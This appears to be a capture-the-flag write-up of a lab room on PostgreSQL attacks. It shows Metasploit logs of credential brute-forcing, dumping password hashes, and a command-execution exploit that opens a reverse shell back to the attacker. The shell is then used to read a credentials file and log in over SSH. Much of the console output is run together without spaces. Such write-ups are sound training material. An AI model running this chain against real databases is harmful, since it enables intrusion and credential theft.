Depending on the EF Codd relational model, an RDBMS allows users to build, update, manage, and interact with a relational database, which stores data as a table.
Relational database can handle a wide range of data formats and process queries efficiently.
Most commercially available RDBMSs currently use Structured Query Language (SQL) to access the database.
RDBMS structures are most commonly used to perform CRUD operations (create, read, update, and delete), which are critical to support consistent data management.
Metasploit contains a variety of modules that can be used to enumerate in multiple rdbms, making it easy to gather valuable information.
After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?
Answer: auxiliary/scanner/postgres/postgres_login
Steps to Reproduce: Search for Postgres
What are the credentials you found?
Answer: postgres:password
Steps to Reproduce:
msf6>useauxiliary/scanner/postgres/postgres_loginmsf6auxiliary(scanner/postgres/postgres_login) >optionsModuleoptions (auxiliary/scanner/postgres/postgres_login):NameCurrentSettingRequiredDescription--------------------------------------BLANK_PASSWORDSfalsenoTryblankpasswordsforallusersBRUTEFORCE_SPEED5yesHowfasttobruteforce,from0to5DATABASEtemplate1yesThedatabasetoauthenticateagainst DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORDnoAspecificpasswordtoauthenticatewithPASS_FILE/usr/share/metasploit-framework/data/wonoFilecontainingpasswords,oneperlinerdlists/postgres_default_pass.txt Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETURN_ROWSETtruenoSettotruetoseequeryresultsets RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'f
ile:<path>' RPORT 5432 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as USERPASS_FILE /usr/share/metasploit-framework/data/wo no File containing (space-separated) users and passwords, one pair per lin
rdlists/postgres_default_userpass.txt e USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/wo no File containing users, one per line rdlists/postgres_default_user.txt VERBOSE true yes Whether to print output for all attemptsmsf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 10.10.181.37RHOSTS => 10.10.181.37msf6 auxiliary(scanner/postgres/postgres_login) > exploit[-] 10.10.181.37:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: Invalid username or password)[+] 10.10.181.37:5432 - Login Successful: postgres:password@template1[-] 10.10.181.37:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)[-] 10.10.181.37:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?
Answer: auxiliary/admin/postgres/postgres_sql
Steps to Reproduce: Search for Postgres
Based on the results of #6, what is the rdbms version installed on the server?
Answer: 9.5.21
Steps to Reproduce:
msf6>useauxiliary/scanner/postgres/postgres_versionmsf6auxiliary(scanner/postgres/postgres_version) >optionsModuleoptions (auxiliary/scanner/postgres/postgres_version):NameCurrentSettingRequiredDescription--------------------------------------DATABASEtemplate1yesThedatabasetoauthenticateagainstPASSWORDpostgresnoThepasswordforthespecifiedusername.Leaveblankforarandompassword. RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT5432yesThetargetportTHREADS1yesThenumberofconcurrentthreads (max oneperhost)USERNAMEpostgresyesTheusernametoauthenticateasVERBOSEfalsenoEnableverboseoutputmsf6auxiliary(scanner/postgres/postgres_version) >setRHOSTS10.10.181.37RHOSTS =>10.10.181.37msf6auxiliary(scanner/postgres/postgres_version) >setPASSWORDpasswordPASSWORD =>passwordmsf6auxiliary(scanner/postgres/postgres_version) >exploit[*] 10.10.181.37:5432 Postgres - Version PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit (Post-Auth)
[*] Scanned 1 of 1 hosts (100%complete)[*] Auxiliary module execution completed
What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
msf6>useauxiliary/scanner/postgres/postgres_hashdumpmsf6auxiliary(scanner/postgres/postgres_hashdump) >optionsModuleoptions (auxiliary/scanner/postgres/postgres_hashdump):NameCurrentSettingRequiredDescription--------------------------------------DATABASEpostgresyesThedatabasetoauthenticateagainstPASSWORDpostgresnoThepasswordforthespecifiedusername.Leaveblankforarandompassword. RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT5432yesThetargetportTHREADS1yesThenumberofconcurrentthreads (max oneperhost)USERNAMEpostgresyesTheusernametoauthenticateasmsf6auxiliary(scanner/postgres/postgres_hashdump) >setRHOSTS10.10.181.37RHOSTS =>10.10.181.37msf6auxiliary(scanner/postgres/postgres_hashdump) >setPASSWORDpasswordPASSWORD =>passwordmsf6auxiliary(scanner/postgres/postgres_hashdump) >exploit[+] Query appears to have run successfully[+] Postgres Server Hashes======================UsernameHash------------darkstartmd58842b99375db43e9fdf238753623a27dpostermd578fb805c7412ae597b399844a54cce0apostgresmd532e12f215ba27cb750c9e093ce4b5127sistemasmd5f7dbc0d5a06653e74da6b1af9290ee2btimd57af9ac4c593e9e4f275576e13f935579tryhackmemd503aab1165001c8f8ccae31a8824efddc[*] Scanned 1 of 1 hosts (100%complete)[*] Auxiliary module execution completed
What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
msf6>useexploit/multi/postgres/postgres_copy_from_program_cmd_exec[*] Using configured payload cmd/unix/reverse_perlmsf6exploit(multi/postgres/postgres_copy_from_program_cmd_exec) >optionsModuleoptions (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):NameCurrentSettingRequiredDescription--------------------------------------DATABASEtemplate1yesThedatabasetoauthenticateagainstDUMP_TABLE_OUTPUTfalsenoselectpayloadcommandoutputfromtable (For Debugging) PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT5432yesThetargetport (TCP)TABLENAMEYL9S0cxgNdRyesAtablenamethatdoesnotexist (To avoiddeletion)USERNAMEpostgresyesTheusernametoauthenticateasPayloadoptions (cmd/unix/reverse_perl):NameCurrentSettingRequiredDescription--------------------------------------LHOSTyesThelistenaddress (an interfacemaybespecified)LPORT4444yesThelistenportExploittarget:IdName------0Automaticmsf6exploit(multi/postgres/postgres_copy_from_program_cmd_exec) >setRHOSTS10.10.181.37RHOSTS =>10.10.181.37msf6exploit(multi/postgres/postgres_copy_from_program_cmd_exec) >setLHOSTtun0LHOST =>10.17.7.91msf6exploit(multi/postgres/postgres_copy_from_program_cmd_exec) >setPASSWORDpasswordPASSWORD =>passwordmsf6exploit(multi/postgres/postgres_copy_from_program_cmd_exec) >exploit[*] Started reverse TCP handler on 10.17.7.91:4444 [*] 10.10.181.37:5432 - 10.10.181.37:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.181.37:5432 - Exploiting...[+] 10.10.181.37:5432 - 10.10.181.37:5432 - YL9S0cxgNdR dropped successfully[+] 10.10.181.37:5432 - 10.10.181.37:5432 - YL9S0cxgNdR created successfully[+] 10.10.181.37:5432 - 10.10.181.37:5432 - YL9S0cxgNdR copied successfully(validsyntax/command)[+] 10.10.181.37:5432 - 10.10.181.37:5432 - YL9S0cxgNdR dropped successfully(Cleaned)[*] 10.10.181.37:5432 - Exploit Succeeded[*] Command shell session 1 opened (10.17.7.91:4444 ->10.10.181.37:52460) at 2021-06-16 15:24:01 +0530ls-la/hometotal16drwxr-xr-x4rootroot4096Jul282020.drwxr-xr-x22rootroot4096Jul282020..drwxr-xr-x4alisonalison4096Jul282020alisondrwxr-xr-x2darkdark4096Jul282020darkls-la/home/darktotal28drwxr-xr-x2darkdark4096Jul282020.drwxr-xr-x4rootroot4096Jul282020..-rw-------1darkdark26Jul282020.bash_history-rw-r--r--1darkdark220Aug312015.bash_logout-rw-r--r--1darkdark3771Aug312015.bashrc-rwxrwxrwx1darkdark24Jul282020credentials.txt-rw-r--r--1darkdark655May162017.profilecat/home/dark/credentials.txtdark:REDACTED
Dark User
sshdark@10.10.181.37dark@10.10.181.37's password: Last login: Wed Jun 16 03:15:14 2021 from 10.17.7.91$ lscredentials.txt$ whoamidark$ cd /home$ lsalison dark$ cd alison$ ls user.txt$ cat user.txt cat: user.txt: Permission denied
To read the user.txt, we need have access as alison
By searching through the file system, find a configuration file: